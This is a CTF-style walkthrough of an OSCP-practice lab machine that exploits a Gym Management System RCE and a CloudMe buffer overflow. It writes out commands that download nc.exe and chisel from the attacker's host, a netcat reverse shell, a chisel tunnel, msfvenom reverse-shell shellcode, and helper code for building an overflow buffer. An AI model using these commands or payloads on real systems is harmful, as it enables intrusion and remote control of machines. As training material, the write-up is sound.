Follow along on my OSCP journey; this is target 8 from TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded AutoRecon, which chains several tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the scanned services.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.198
Autorecon
While it runs, I usually start with the _quick_tcp_nmap.txt file while waiting for _full_tcp_nmap.txt to finish.
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Only one port is open and the banner tells us the whole stack: Apache 2.4.43 with PHP 7.4.6 on a Win64 host (the TTL of 127 also points to Windows). At least we know what to exploit!
Web— 8080
Gobuster
/About.php (Status: 200) [Size: 5337]
/Contact.php (Status: 200) [Size: 4169]
/Home.php (Status: 200) [Size: 143]
/Index.php (Status: 200) [Size: 4969]
/LICENSE (Status: 200) [Size: 18025]
/about.php (Status: 200) [Size: 5337]
/contact.php (Status: 200) [Size: 4169]
/boot (Status: 301) [Size: 342]
/ex (Status: 301) [Size: 340]
/img (Status: 301) [Size: 341]
/include (Status: 301) [Size: 345]
include/process_login.php
HINT
There is one clear piece of information on one of the pages that unlocks the next step; can you find it?
.
.
.
.
We see the following information
Let’s look for exploits for that software!
Gym Management System 1.0 - Unauthenticated Remote Code Execution | exploits/php/webapps/48506.py
Sweet, an RCE is available for that version of the software, and it is unauthenticated.
python 48506.py http://10.10.10.198:8080/
Let’s get some information about the user
Let’s try to get a stable reverse shell. The exploit’s pseudo-shell runs each command through the web application, which is fine for looking around but not for what comes next.
First, we’ll host nc.exe on a file server.
Let’s grab nc.exe, start a listener and get a reverse shell.
powershell -c iwr http://10.10.14.46/nc.exe -outf \users\shaun\downloads\nc.exe
\users\shaun\downloads\nc.exe 10.10.14.46 1337 -e cmd.exe
Getting Root
This one comes down to spotting the unusual things
HINT
Was there something else in the folder where we uploaded our nc.exe?
.
.
.
.
The Downloads folder contains an interesting piece of software.
Let’s look for exploits!
CloudMe 1.11.2 - Buffer Overflow (PoC)| exploits/windows/remote/48389.py
First of all, can we see it running on the machine? The exploit targets port 8888, so let us check whether anything is listening there.
netstat -ano
We found it!
Proto  Local Address          Foreign Address        State           PID
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       4160
TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       8376
TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7844
TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       528
TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1104
TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1580
TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2188
TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       668
TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       684
TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
TCP    10.10.10.198:8080      10.10.14.46:54732      ESTABLISHED     7844
TCP    10.10.10.198:51051     10.10.14.46:1337       ESTABLISHED     8280
TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       6740
TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2000
TCP    [::]:135               [::]:0                 LISTENING       948
TCP    [::]:445               [::]:0                 LISTENING       4
TCP    [::]:7680              [::]:0                 LISTENING       8376
TCP    [::]:8080              [::]:0                 LISTENING       7844
TCP    [::]:49664             [::]:0                 LISTENING       528
TCP    [::]:49665             [::]:0                 LISTENING       1104
TCP    [::]:49666             [::]:0                 LISTENING       1580
TCP    [::]:49667             [::]:0                 LISTENING       2188
TCP    [::]:49668             [::]:0                 LISTENING       668
TCP    [::]:49669             [::]:0                 LISTENING       684
UDP    0.0.0.0:123            *:*                                    7552
UDP    0.0.0.0:5050           *:*                                    4160
UDP    0.0.0.0:5353           *:*                                    2036
UDP    0.0.0.0:5355           *:*                                    2036
UDP    0.0.0.0:62110          *:*                                    2036
UDP    0.0.0.0:63009          *:*                                    2036
UDP    10.10.10.198:137       *:*                                    4
UDP    10.10.10.198:138       *:*                                    4
UDP    10.10.10.198:1900      *:*                                    5364
UDP    10.10.10.198:58415     *:*                                    5364
UDP    127.0.0.1:1900         *:*                                    5364
UDP    127.0.0.1:55197        *:*                                    3052
UDP    127.0.0.1:58417        *:*                                    5364
UDP    [::]:123               *:*                                    7552
UDP    [::]:5353              *:*                                    2036
UDP    [::]:5355              *:*                                    2036
UDP    [::]:62110             *:*                                    2036
UDP    [::]:63009             *:*                                    2036
UDP    [::1]:1900             *:*                                    5364
UDP    [::1]:58414            *:*                                    536
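Before reaching for chisel it pays to read the whole netstat table rather than grep for the one port we expect. As an added example (not from the original walkthrough), here is a small parser that takes netstat -ano output and reports every TCP port that listens only on loopback, i.e. the services nmap could never have shown us from Kali and that need a tunnel. The sample input is a trimmed copy of the listing above.

```python
"""Triage `netstat -ano` output for loopback-only listeners.

Added example, not part of the original walkthrough. A TCP port bound only
to 127.0.0.1 / [::1] is invisible to an external nmap scan and is exactly
the kind of service that needs a tunnel (chisel, ssh -L, ...) before an
exploit can reach it.
"""

# Sample trimmed from the netstat -ano output captured on the box above.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       7844
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.14.46:54732      ESTABLISHED     7844
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       6740
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2000
  TCP    [::]:135               [::]:0                 LISTENING       948
  TCP    [::]:8080              [::]:0                 LISTENING       7844
  UDP    0.0.0.0:123            *:*                                    7552
"""

LOOPBACK = {"127.0.0.1", "::1"}


def split_addr(addr):
    """'127.0.0.1:8888' -> ('127.0.0.1', 8888); '[::]:135' -> ('::', 135)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def parse_listeners(text):
    """Return [(host, port, pid)] for every TCP socket in LISTENING state.

    UDP rows have no State column (4 fields) and the header has 7, so the
    5-field check keeps only TCP rows; ESTABLISHED rows are filtered by state.
    """
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            host, port = split_addr(parts[1])
            out.append((host, port, int(parts[4])))
    return out


def loopback_only_ports(text):
    """Ports that listen on loopback and on no wildcard or routable address.

    Returns {port: pid}. A port also bound to 0.0.0.0, [::] or the host's own
    address is reachable from outside and does not need forwarding.
    """
    exposed = set()
    local = {}
    for host, port, pid in parse_listeners(text):
        if host in LOOPBACK:
            local[port] = pid
        else:
            exposed.add(port)
    return {p: pid for p, pid in local.items() if p not in exposed}


if __name__ == "__main__":
    for port, pid in sorted(loopback_only_ports(NETSTAT_SAMPLE).items()):
        print(f"127.0.0.1:{port} (PID {pid}) is loopback-only: needs a port forward")
```

On the sample this flags 8888 (CloudMe) and also 3306 (MySQL, which the web app uses), while 8080 is excluded because it is also bound to 0.0.0.0. Paste the full listing in place of the sample when you run it on a real box.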
There are a couple of things we need to do before we can run the exploit.
Exposing the service to our Kali machine
CloudMe is bound to 127.0.0.1:8888 only, which is why it never showed up in our nmap scan and cannot be reached from Kali directly; we have to tunnel it. We use chisel.exe for the port forwarding; it works in a client-server manner, with the server on Kali and the client on the victim.
On Kali, we can just start the server part
chisel server -p 6666 --reverse
On the victim, we upload the client and run the client
powershell -c iwr http://10.10.14.46/chisel -outf \users\shaun\downloads\chisel
start chisel client 10.10.14.46:6666 R:8888:127.0.0.1:8888
The R: prefix makes this a reverse tunnel (allowed because the server was started with --reverse): port 8888 on Kali’s loopback now points at 127.0.0.1:8888 on the victim.
Modifying the exploit
First, we point the exploit at 127.0.0.1, because the chisel tunnel exposes the victim’s CloudMe port on our own machine.
target = "127.0.0.1"
Secondly, the payload in the PoC only pops a calculator, which is great for testing, but we’d rather have a reverse shell, so let’s generate our own. We keep the bad characters listed in the PoC (\x00\x0a\x0d) out of the payload, stay with an x86 payload (the default for windows/ payloads, and what a 32-bit stack overflow needs), and pick the stageless windows/shell_reverse_tcp so a plain nc listener can catch it; a staged meterpreter payload would need a multi/handler instead. msfvenom’s -v flag sets the variable name of the generated buffer, which saves renaming it to match the PoC by hand.
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.46 LPORT=5555 -b '\x00\x0a\x0d' -f python
buf = b""
buf += b"\xda\xd8\xbb\x34\x2a\xda\xf1\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x52\x31\x58\x17\x83\xe8\xfc\x03\x6c\x39\x38"
buf += b"\x04\x70\xd5\x3e\xe7\x88\x26\x5f\x61\x6d\x17\x5f\x15"
buf += b"\xe6\x08\x6f\x5d\xaa\xa4\x04\x33\x5e\x3e\x68\x9c\x51"
buf += b"\xf7\xc7\xfa\x5c\x08\x7b\x3e\xff\x8a\x86\x13\xdf\xb3"
buf += b"\x48\x66\x1e\xf3\xb5\x8b\x72\xac\xb2\x3e\x62\xd9\x8f"
buf += b"\x82\x09\x91\x1e\x83\xee\x62\x20\xa2\xa1\xf9\x7b\x64"
buf += b"\x40\x2d\xf0\x2d\x5a\x32\x3d\xe7\xd1\x80\xc9\xf6\x33"
buf += b"\xd9\x32\x54\x7a\xd5\xc0\xa4\xbb\xd2\x3a\xd3\xb5\x20"
buf += b"\xc6\xe4\x02\x5a\x1c\x60\x90\xfc\xd7\xd2\x7c\xfc\x34"
buf += b"\x84\xf7\xf2\xf1\xc2\x5f\x17\x07\x06\xd4\x23\x8c\xa9"
buf += b"\x3a\xa2\xd6\x8d\x9e\xee\x8d\xac\x87\x4a\x63\xd0\xd7"
buf += b"\x34\xdc\x74\x9c\xd9\x09\x05\xff\xb5\xfe\x24\xff\x45"
buf += b"\x69\x3e\x8c\x77\x36\x94\x1a\x34\xbf\x32\xdd\x3b\xea"
buf += b"\x83\x71\xc2\x15\xf4\x58\x01\x41\xa4\xf2\xa0\xea\x2f"
buf += b"\x02\x4c\x3f\xff\x52\xe2\x90\x40\x02\x42\x41\x29\x48"
buf += b"\x4d\xbe\x49\x73\x87\xd7\xe0\x8e\x40\xd2\xfe\x9e\xbe"
buf += b"\x8a\xfc\x9e\xab\xf9\x88\x78\xb9\xed\xdc\xd3\x56\x97"
buf += b"\x44\xaf\xc7\x58\x53\xca\xc8\xd3\x50\x2b\x86\x13\x1c"
buf += b"\x3f\x7f\xd4\x6b\x1d\xd6\xeb\x41\x09\xb4\x7e\x0e\xc9"
buf += b"\xb3\x62\x99\x9e\x94\x55\xd0\x4a\x09\xcf\x4a\x68\xd0"
buf += b"\x89\xb5\x28\x0f\x6a\x3b\xb1\xc2\xd6\x1f\xa1\x1a\xd6"
buf += b"\x1b\x95\xf2\x81\xf5\x43\xb5\x7b\xb4\x3d\x6f\xd7\x1e"
buf += b"\xa9\xf6\x1b\xa1\xaf\xf6\x71\x57\x4f\x46\x2c\x2e\x70"
buf += b"\x67\xb8\xa6\x09\x95\x58\x48\xc0\x1d\x68\x03\x48\x37"
buf += b"\xe1\xca\x19\x05\x6c\xed\xf4\x4a\x89\x6e\xfc\x32\x6e"
buf += b"\x6e\x75\x36\x2a\x28\x66\x4a\x23\xdd\x88\xf9\x44\xf4"
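Swapping the calc shellcode for a reverse shell changes two things a PoC silently depends on: the shellcode gets longer and must still fit the fixed-size buffer, and every byte must avoid the bad characters the exploit was written around. As an added example (not code from the walkthrough or from the CloudMe PoC), the helper below checks both before anything is sent and assembles the buffer. The layout (padding up to the saved return address, the overwritten EIP, a NOP sled, the shellcode, filler to a fixed total) is the generic vanilla stack-overflow shape; OFFSET, RET_ADDR and TOTAL_LEN are placeholders, not the real exploit’s values, and the sample shellcodes are constructed.

```python
"""Drop msfvenom shellcode into a stack-overflow PoC without breaking it.

Added example, not code from the walkthrough or from the CloudMe PoC.
The offsets below are illustration placeholders, not the exploit's numbers.
"""
import struct

BADCHARS = b"\x00\x0a\x0d"   # the set passed to msfvenom -b in the walkthrough

# Placeholders for illustration only (not the CloudMe exploit's values).
OFFSET = 8            # bytes of padding before the saved return address
RET_ADDR = 0x41424344 # address of the gadget that lands in the NOP sled
TOTAL_LEN = 64        # fixed buffer size the PoC sends

# Constructed samples: an unencoded prologue full of NULs, and the first
# bytes of the encoded msfvenom output shown above.
DIRTY_SHELLCODE = b"\xfc\xe8\x82\x00\x00\x00\x60"
CLEAN_SHELLCODE = b"\xda\xd8\xbb\x34\x2a\xda"


def find_badchars(data, badchars=BADCHARS):
    """Return [(index, byte)] for every bad character present in data."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def check_payload(shellcode, ret_addr=RET_ADDR, total_len=TOTAL_LEN,
                  offset=OFFSET, nop_len=16, badchars=BADCHARS):
    """List everything that would make the exploit fail; [] means go ahead."""
    problems = []
    hits = find_badchars(shellcode, badchars)
    if hits:
        problems.append(f"shellcode has bad chars at {[i for i, _ in hits]}")
    # The return address is sent as raw bytes too, so it must also be clean.
    if find_badchars(struct.pack("<I", ret_addr), badchars):
        problems.append("return address contains a bad char")
    needed = offset + 4 + nop_len + len(shellcode)
    if needed > total_len:
        problems.append(f"payload needs {needed} bytes, buffer holds {total_len}")
    return problems


def build_buffer(shellcode, ret_addr=RET_ADDR, total_len=TOTAL_LEN,
                 offset=OFFSET, nop_len=16, badchars=BADCHARS):
    """padding | EIP | NOP sled | shellcode | filler, exactly total_len bytes."""
    problems = check_payload(shellcode, ret_addr, total_len, offset, nop_len, badchars)
    if problems:
        raise ValueError("; ".join(problems))
    body = (b"\x90" * offset
            + struct.pack("<I", ret_addr)   # little-endian, as the CPU reads it
            + b"\x90" * nop_len
            + shellcode)
    return body + b"\x43" * (total_len - len(body))


if __name__ == "__main__":
    print("dirty shellcode:", check_payload(DIRTY_SHELLCODE))
    print("clean buffer:", len(build_buffer(CLEAN_SHELLCODE)), "bytes")
```

Run check_payload on the real msfvenom output with the PoC’s own offset, return address and buffer size before firing the exploit; an empty list means the swap is safe.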
Running the modified exploit
Time to get it all working together: we start a listener on port 5555 and execute the modified exploit against the chisel tunnel.
python 48389.py
Let’s go, another owned machine!
What did I learn?
- We learned to always check the version of any service we find and see if it is vulnerable to anything known.
- We learned how to port forward a service using chisel.exe
- We learned how to understand and modify an existing exploit.
Quite a simple one, but it could easily lead you down some rabbit holes. I hope you liked it!
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.